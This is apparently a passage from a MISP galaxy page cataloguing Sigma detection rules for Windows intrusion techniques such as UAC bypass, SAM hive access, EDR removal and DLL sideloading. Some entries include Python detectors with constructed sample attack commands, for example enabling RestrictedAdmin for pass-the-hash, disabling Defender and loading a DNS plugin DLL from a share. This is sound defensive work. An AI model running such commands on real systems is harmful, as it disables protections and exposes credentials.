External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/08
falsepositive ['Unknown']
filename proc_creation_win_mshta_http.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.005']

PowerShell Set-Acl On Windows Folder

Detects PowerShell scripts to set the ACL to a file in the Windows folder

Internal MISP references

UUID 0944e002-e3f6-4eb5-bf69-3a3067b53d73 which can be used as unique global reference for PowerShell Set-Acl On Windows Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unknown']
filename proc_creation_win_powershell_set_acl_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Memory Dumping Activity Via LiveKD

Detects execution of LiveKD based on PE metadata or image name

Internal MISP references

UUID a85f7765-698a-4088-afa0-ecfbf8d01fa4 which can be used as unique global reference for Potential Memory Dumping Activity Via LiveKD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Administration and debugging activity (must be investigated)']
filename proc_creation_win_sysinternals_livekd_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

Internal MISP references

UUID 6e22722b-dfb1-4508-a911-49ac840b40f8 which can be used as unique global reference for Suspicious Mstsc.EXE Execution With Local RDP File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Likelihood is related to how often the paths are used in the environment']
filename proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Suspicious Extrac32 Execution

Detects the use of extrac32.exe to download or copy a file.

Internal MISP references

UUID aa8e035d-7be4-48d3-a944-102aec04400d which can be used as unique global reference for Suspicious Extrac32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extrac32.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Potential RDP Session Hijacking Activity

Detects potential RDP session hijacking on Windows systems via tscon.exe, which a process running as SYSTEM can use to attach another user's session without knowing that user's password.

Internal MISP references

UUID 224f140f-3553-4cd1-af78-13d81bf9f7cc which can be used as unique global reference for Potential RDP Session Hijacking Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @juju4
creation_date 2022/12/27
falsepositive ['Administrative activity']
filename proc_creation_win_tscon_rdp_session_hijacking.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Nslookup PowerShell Download Cradle - ProcessCreation

Detects a suspicious PowerShell download cradle that uses nslookup to extract payloads from DNS records.

Internal MISP references

UUID 1b3b01c7-84e9-4072-86e5-fc285a41ff23 which can be used as unique global reference for Nslookup PowerShell Download Cradle - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/05
falsepositive ['Unknown']
filename proc_creation_win_nslookup_poweshell_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Msbuild Execution By Uncommon Parent Process

Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process.

Internal MISP references

UUID 33be4333-2c6b-44f4-ae28-102cdbde0a31 which can be used as unique global reference for Suspicious Msbuild Execution By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/11/17
falsepositive ['Unknown']
filename proc_creation_win_msbuild_susp_parent_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Rar Usage with Password and Compression Level

Detects the use of rar.exe on the command line to create an archive with password protection or with a specific compression level, which is often indicative of malicious staging before exfiltration.

Internal MISP references

UUID faa48cae-6b25-4f00-a094-08947fef582f which can be used as unique global reference for Rar Usage with Password and Compression Level in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020/05/12
falsepositive ['Legitimate use of Winrar command line version', 'Other command line tools, that use these flags']
filename proc_creation_win_rar_compression_with_password.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

Detects execution of various log query utilities and commands used to search and dump the content of specific event logs or to look for specific event IDs. Threat actors use this technique to extract sensitive information from event logs such as usernames, IP addresses and hostnames.

Internal MISP references

UUID beaa66d6-aa1b-4e3c-80f5-e0145369bfaf which can be used as unique global reference for Potentially Suspicious EventLog Recon Activity Using Log Query Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Legitimate usage of the utility by administrators to query the event log']
filename proc_creation_win_susp_eventlog_content_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.discovery', 'attack.t1552']
Related clusters

To see the related clusters, click here.
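As an added example for this page (not the Sigma rule's own logic), the Python below extracts the querying tool, the targeted log and any requested event IDs from constructed command lines. It treats `wevtutil qe`/`epl`, `Get-WinEvent` and `Get-EventLog` as query tools; the set of "sensitive" log names and the sample command lines are assumptions of the example, and the parsing is deliberately tolerant of the hashtable, XPath and cmdlet forms in which event IDs appear.

```python
import re

# Constructed sample command lines from process-creation events (not real telemetry).
SAMPLE_COMMANDLINES = [
    'wevtutil.exe qe Security /q:"*[System[(EventID=4624)]]" /f:text /c:50',
    'powershell.exe -NoP -C "Get-WinEvent -FilterHashtable @{LogName=\'Security\'; ID=4625,4624} -MaxEvents 100"',
    'powershell.exe -C "Get-EventLog -LogName Security -InstanceId 4648 | Format-List"',
    'wevtutil.exe gl Application',
    'powershell.exe -C "Get-WinEvent -LogName Application -MaxEvents 10"',
]

# Query/export tools; listing log metadata (wevtutil gl/el) is not interesting here.
TOOLS = [
    ("wevtutil", re.compile(r"\bwevtutil(?:\.exe)?\s+(?:qe|query-events|epl|export-log)\b", re.I)),
    ("Get-WinEvent", re.compile(r"\bGet-WinEvent\b", re.I)),
    ("Get-EventLog", re.compile(r"\bGet-EventLog\b", re.I)),
]
# Log name following -LogName, LogName= or a wevtutil query/export verb.
LOG_NAME = re.compile(
    r"(?:-LogName\s+|LogName\s*=\s*|\b(?:qe|query-events|epl|export-log)\s+)['\"]?([^'\"\s;}]+)", re.I)
# Event IDs written as EventID=4624, ID=4625,4624, -InstanceId 4648 or Id -eq 4624.
EVENT_IDS = re.compile(
    r"(?:EventID|\bId|InstanceId)\s*(?:=|-eq|\s)\s*['\"]?(\d{3,5}(?:\s*,\s*\d{3,5})*)", re.I)
# Logs whose content is attractive to an intruder (assumption: extend to taste).
SENSITIVE_LOGS = {
    "security",
    "microsoft-windows-terminalservices-localsessionmanager/operational",
    "microsoft-windows-powershell/operational",
}


def analyse_eventlog_query(cmdline):
    """Return tool, log and event IDs when a command line reads a sensitive
    log or hunts for specific event IDs; None otherwise."""
    tool = next((name for name, rx in TOOLS if rx.search(cmdline)), None)
    if tool is None:
        return None
    m = LOG_NAME.search(cmdline)
    log = m.group(1) if m else None
    ids = []
    for m in EVENT_IDS.finditer(cmdline):
        ids.extend(int(x) for x in re.split(r"\s*,\s*", m.group(1)))
    sensitive = log is not None and log.lower() in SENSITIVE_LOGS
    if not sensitive and not ids:
        return None
    return {"tool": tool, "log": log, "event_ids": ids, "sensitive_log": sensitive}


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDLINES:
        print(cmd, "->", analyse_eventlog_query(cmd))
```

Reading the Application log with no event filter is left unreported, which is where the rule's stated false positive (administrators querying logs) mostly lives; a query against the Security log or for logon-related IDs is what deserves the medium severity.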

Renamed Office Binary Execution

Detects the execution of a renamed Microsoft Office binary

Internal MISP references

UUID 0b0cd537-fc77-4e6e-a973-e53495c1083d which can be used as unique global reference for Renamed Office Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/20
falsepositive ['Unknown']
filename proc_creation_win_renamed_office_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Advpack Call Via Rundll32.EXE

Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function

Internal MISP references

UUID a1473adb-5338-4a20-b4c3-126763e2d3d3 which can be used as unique global reference for Suspicious Advpack Call Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

TrustedPath UAC Bypass Pattern

Detects indicators of a UAC bypass method that mocks trusted directories

Internal MISP references

UUID 4ac47ed3-44c2-4b1f-9d51-bf46e8914126 which can be used as unique global reference for TrustedPath UAC Bypass Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/27
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_trustedpath.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.
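The mocked-directory trick behind this rule relies on a directory name that differs from a trusted path only by whitespace (for example a trailing space after "Windows"), which path normalisation collapses onto the real, trusted location. The Python below is an added example for this page, not the Sigma rule's logic: it normalises each component of an image path and reports when the normalised directory lands on a trusted system directory. The sample paths and binary names are constructed; the set of trusted directories is an assumption of the example.

```python
# Constructed sample image paths (hypothetical binary names, not real telemetry).
SAMPLE_IMAGES = [
    r"C:\Windows \System32\tool.exe",
    r"C:\Windows\System32 \cmd.exe",
    r"C:\Windows\System32\winsat.exe",
    r"C:\Users\bob\Windows \System32\tool.exe",
]

# Directories whose executables are trusted for auto-elevation (assumption).
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def mocked_trusted_directory(image_path):
    """Return details when a directory component carries leading or trailing
    whitespace and the whitespace-stripped directory is a trusted one."""
    parts = image_path.split("\\")
    directory = parts[:-1]                      # drop the file name
    # Components that only differ from their stripped form by whitespace.
    mocked = [p for p in directory if p.strip() and p != p.strip()]
    if not mocked:
        return None
    normalised = "\\".join(p.strip() for p in directory).lower()
    if normalised not in TRUSTED_DIRS:
        return None
    return {"mocked_component": mocked[0], "normalised_directory": normalised}


if __name__ == "__main__":
    for image in SAMPLE_IMAGES:
        print(repr(image), "->", mocked_trusted_directory(image))
```

A directory whose name ends in a space cannot be created through the ordinary Win32 path API, which strips trailing spaces; it takes the `\\?\` prefix. File-creation events for such a path are therefore a complementary, earlier signal to the process-creation one this rule uses.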

New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

Internal MISP references

UUID f63b56ee-3f79-4b8a-97fb-5c48007e8573 which can be used as unique global reference for New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/08
falsepositive ['Unknown']
filename proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002', 'attack.t1112']
Related clusters

To see the related clusters, click here.
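As an added example for this page (not the Sigma rule's logic), the following Python parses constructed dnscmd command lines, handles the optional server-name argument, and reports the plugin DLL path together with whether it is a UNC path, which is the variant that lets the DNS service load code straight from an attacker-controlled share. The dnscmd syntax (`dnscmd [<ServerName>] /config /serverlevelplugindll <path>`) is Microsoft's documented one; the sample command lines are constructed.

```python
import shlex

# Constructed sample command lines (not real telemetry).
SAMPLE_COMMANDLINES = [
    r"dnscmd.exe /config /serverlevelplugindll \\10.0.0.5\share\plugin.dll",
    r"dnscmd dc01 /config /ServerLevelPluginDll C:\Windows\Temp\p.dll",
    r"dnscmd.exe /info",
    r"dnscmd dc01 /enumzones",
]

# The same setting lives under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
# as the ServerLevelPluginDll value; registry monitoring of that key is the
# complementary detection for changes made without dnscmd.


def analyse_dnscmd(cmdline):
    """Return target server and plugin path when dnscmd sets
    ServerLevelPluginDll, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        return None
    if not argv:
        return None
    exe = argv[0].strip('"').rsplit("\\", 1)[-1].lower()
    if exe not in ("dnscmd", "dnscmd.exe"):
        return None
    args = argv[1:]
    target = "(local)"
    if args and not args[0].startswith("/"):     # optional <ServerName> comes first
        target, args = args[0], args[1:]
    if not args or args[0].lower() != "/config":
        return None
    for i, arg in enumerate(args[1:], start=1):
        if arg.lower() == "/serverlevelplugindll":
            dll = args[i + 1] if i + 1 < len(args) else ""
            return {"target_server": target, "plugin_dll": dll,
                    "remote_dll": dll.startswith("\\\\")}
    return None


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDLINES:
        print(cmd, "->", analyse_dnscmd(cmd))
```

Because the DLL is only loaded after the DNS service restarts, a matching event followed by a restart of the DNS service (or of the domain controller) is the sequence to look for when triaging.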

File Download Using Notepad++ GUP Utility

Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.

Internal MISP references

UUID 44143844-0631-49ab-97a0-96387d6b2d7c which can be used as unique global reference for File Download Using Notepad++ GUP Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Parent processes other than Notepad++ that legitimately use GUP and are not yet identified']
filename proc_creation_win_gup_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

PowerShell SAM Copy

Detects suspicious PowerShell scripts accessing SAM hives

Internal MISP references

UUID 1af57a4b-460a-4738-9034-db68b880c665 which can be used as unique global reference for PowerShell SAM Copy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/29
falsepositive ['Some rare backup scenarios', 'PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs']
filename proc_creation_win_powershell_sam_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

HackTool - Certify Execution

Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.

Internal MISP references

UUID 762f2482-ff21-4970-8939-0aa317a886bb which can be used as unique global reference for HackTool - Certify Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unknown']
filename proc_creation_win_hktl_certify.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

UAC Bypass Using NTFS Reparse Point - Process

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Internal MISP references

UUID 39ed3c80-e6a1-431b-9df3-911ac53d08a7 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_ntfs_reparse_point.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Renamed ProcDump Execution

Detects the execution of a renamed ProcDump executable often used by attackers or malware

Internal MISP references

UUID 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 which can be used as unique global reference for Renamed ProcDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/11/18
falsepositive ['ProcDump illegally bundled with legitimate software', 'Administrators who rename binaries (should be investigated)']
filename proc_creation_win_renamed_sysinternals_procdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.

Internal MISP references

UUID b2b048b0-7857-4380-b0fb-d3f0ab820b71 which can be used as unique global reference for Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/05
falsepositive ['Administrators building packages using iexpress.exe']
filename proc_creation_win_iexpress_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Nimgrab Execution

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

Internal MISP references

UUID 74a12f18-505c-4114-8d0b-8448dd5485c6 which can be used as unique global reference for PUA - Nimgrab Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/28
falsepositive ['Legitimate use of Nim on developer systems']
filename proc_creation_win_pua_nimgrab.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Application Whitelisting Bypass via Dxcap.exe

Detects execution of Dxcap.exe

Internal MISP references

UUID 60f16a96-db70-42eb-8f76-16763e333590 which can be used as unique global reference for Application Whitelisting Bypass via Dxcap.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Legitimate execution of dxcap.exe by a legitimate user']
filename proc_creation_win_lolbin_susp_dxcap.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Mpclient.DLL Sideloading Via Defender Binaries

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

Internal MISP references

UUID 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 which can be used as unique global reference for Potential Mpclient.DLL Sideloading Via Defender Binaries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/08/01
falsepositive ['Unlikely']
filename proc_creation_win_mpcmdrun_dll_sideload_defender.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Xwizard DLL Sideloading

Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll

Internal MISP references

UUID 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1 which can be used as unique global reference for Xwizard DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/09/20
falsepositive ['Windows installed on non-C drive']
filename proc_creation_win_lolbin_dll_sideload_xwizard.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Renamed CURL.EXE Execution

Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields

Internal MISP references

UUID 7530cd3d-7671-43e3-b209-976966f6ea48 which can be used as unique global reference for Renamed CURL.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/09/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_curl.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

RestrictedAdminMode Registry Value Tampering - ProcCreation

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop, so your credentials cannot be harvested during the initial connection if the remote server has been compromised. Enabling it, however, also permits an RDP logon with only an NT hash, which is why changes in either direction are worth reviewing.

Internal MISP references

UUID 28ac00d6-22d9-4a3c-927f-bbd770104573 which can be used as unique global reference for RestrictedAdminMode Registry Value Tampering - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Unknown']
filename proc_creation_win_reg_lsa_disable_restricted_admin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.
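An added example for this page (not the Sigma rule's logic): the Python below recognises both the `reg.exe add` and the PowerShell `Set-ItemProperty`/`New-ItemProperty` ways of writing the value, ignores read-only `reg query`, and interprets the new data, since a value of 0 enables RestrictedAdmin mode (and with it pass-the-hash over RDP) while a non-zero value disables it (and exposes reusable credentials to the remote host). The key path `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` and the value name are the real ones; the sample command lines are constructed.

```python
import re

# Constructed sample command lines (not real telemetry).
SAMPLE_COMMANDLINES = [
    r"reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f",
    'powershell.exe -C "Set-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name DisableRestrictedAdmin -Value 1"',
    r"reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 5 /f",
    r"reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin",
]

# Only write operations matter; "reg query" and Get-ItemProperty are reads.
WRITE_OPERATION = re.compile(r"\breg(?:\.exe)?\s+add\b|\b(?:Set|New)-ItemProperty\b", re.I)
LSA_KEY = re.compile(r"\\SYSTEM\\CurrentControlSet\\Control\\Lsa\b", re.I)
VALUE_NAME = re.compile(r"(?:/v|-Name)\s+['\"]?DisableRestrictedAdmin\b", re.I)
# Data given as /d 0, /d 0x1 or -Value 1.
VALUE_DATA = re.compile(r"(?:/d|-Value)\s+['\"]?(0x[0-9a-f]+|\d+)", re.I)


def analyse_restricted_admin_change(cmdline):
    """Return the new value and its security effect for a write to
    DisableRestrictedAdmin, else None."""
    if not (WRITE_OPERATION.search(cmdline) and LSA_KEY.search(cmdline)
            and VALUE_NAME.search(cmdline)):
        return None
    m = VALUE_DATA.search(cmdline)
    try:
        value = int(m.group(1), 0) if m else None
    except ValueError:
        value = None
    if value == 0:
        effect = "RestrictedAdmin mode enabled: RDP logon with an NT hash (pass-the-hash) becomes possible"
    elif value is None:
        effect = "value data not parsed; inspect the command line"
    else:
        effect = "RestrictedAdmin mode disabled: reusable credentials are sent to the remote host"
    return {"value_data": value, "effect": effect}


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDLINES:
        print(cmd, "->", analyse_restricted_admin_change(cmd))
```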

Service StartupType Change Via PowerShell Set-Service

Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"

Internal MISP references

UUID 62b20d44-1546-4e61-afce-8e175eb9473c which can be used as unique global reference for Service StartupType Change Via PowerShell Set-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/04
falsepositive ['False positives may occur with troubleshooting scripts']
filename proc_creation_win_powershell_set_service_disabled.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.
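The Python below is an added example for this page, not the Sigma rule's logic. It pulls the service name and requested startup type out of constructed PowerShell command lines, covering the named, positional and pipelined (`Get-Service X | Set-Service`) forms, and only reports "Disabled" and "Manual" as the rule describes. PowerShell accepts any unambiguous prefix of a parameter name, so `-Star`, `-Startup` and `-StartupType` are all matched; the sample command lines and service names are constructed.

```python
import re

# Constructed sample command lines (not real telemetry).
SAMPLE_COMMANDLINES = [
    'powershell.exe -NoP -C "Set-Service -Name WinDefend -StartupType Disabled"',
    'powershell.exe -C "Get-Service Sense | Set-Service -StartupType Manual"',
    'powershell.exe -C "Set-Service wuauserv -Startup Disabled"',
    'powershell.exe -C "Set-Service -Name Spooler -StartupType Automatic"',
    'powershell.exe -C "Set-Service -Name Spooler -Status Running"',
]

# Arguments of one Set-Service call, up to the next pipe, separator or closing quote.
SET_SERVICE = re.compile(r"Set-Service\b([^|;\"]*)", re.I)
# -StartupType abbreviated to any prefix from -Star upwards (-Sta would clash with -Status).
STARTUP = re.compile(
    r"-Star\w*\s+['\"]?(Disabled|Manual|Automatic|AutomaticDelayedStart|Boot|System)\b", re.I)
NAMED = re.compile(r"-N(?:a(?:me?)?)?\s+['\"]?([\w.\-$]+)", re.I)
POSITIONAL = re.compile(r"^\s*['\"]?([^\s'\"\-][\w.\-$]*)")
PIPED_FROM = re.compile(r"Get-Service\s+(?:-Name\s+)?['\"]?([\w.\-$]+)[^|]*\|\s*Set-Service", re.I)
ALERT_ON = {"disabled", "manual"}


def analyse_set_service(cmdline):
    """Return service and startup type for a Set-Service call that sets the
    service to Disabled or Manual, else None."""
    for m in SET_SERVICE.finditer(cmdline):
        args = m.group(1)
        st = STARTUP.search(args)
        if not st or st.group(1).lower() not in ALERT_ON:
            continue
        name = NAMED.search(args) or POSITIONAL.search(args)
        service = name.group(1) if name else None
        if service is None:                      # name arrived through the pipeline
            piped = PIPED_FROM.search(cmdline)
            service = piped.group(1) if piped else None
        return {"service": service, "startup_type": st.group(1)}
    return None


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDLINES:
        print(cmd, "->", analyse_set_service(cmd))
```

Command-line parsing of this kind misses encoded commands and parameters passed by splatting, so on hosts with script block logging enabled the same check is better run against PowerShell script block events than against process creation alone.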

Uninstall Crowdstrike Falcon Sensor

Detects the uninstallation of the CrowdStrike Falcon sensor. Adversaries may disable security tools to avoid detection of their tools and activities, and uninstalling the EDR sensor is one way to do so.

Internal MISP references

UUID f0f7be61-9cf5-43be-9836-99d6ef448a18 which can be used as unique global reference for Uninstall Crowdstrike Falcon Sensor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/12
falsepositive ['An administrator might run the same command line for debugging or other purposes. This action must always be investigated']
filename proc_creation_win_uninstall_crowdstrike_falcon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Discovery of a System Time

Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

Internal MISP references

UUID b243b280-65fe-48df-ba07-6ddea7646427 which can be used as unique global reference for Discovery of a System Time in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate use of the system utilities to discover system time for legitimate reason']
filename proc_creation_win_remote_time_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1124']
Related clusters

To see the related clusters, click here.

Remote Access Tool - RURAT Execution From Unusual Location

Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')

Internal MISP references

UUID e01fa958-6893-41d4-ae03-182477c5e77d which can be used as unique global reference for Remote Access Tool - RURAT Execution From Unusual Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_remote_access_tools_rurat_non_default_location.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Remote Access Tool - AnyDesk Silent Installation

Detects a silent installation of AnyDesk Remote Desktop, which attackers can use to gain remote access.

Internal MISP references

UUID 114e7f1c-f137-48c8-8f54-3088c24ce4b9 which can be used as unique global reference for Remote Access Tool - AnyDesk Silent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský
creation_date 2021/08/06
falsepositive ['Legitimate deployment of AnyDesk']
filename proc_creation_win_remote_access_tools_anydesk_silent_install.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

HackTool - PowerTool Execution

Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files

Internal MISP references

UUID a34f79a3-8e5f-4cc3-b765-de00695452c2 which can be used as unique global reference for HackTool - PowerTool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/29
falsepositive ['Unlikely']
filename proc_creation_win_hktl_powertool.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

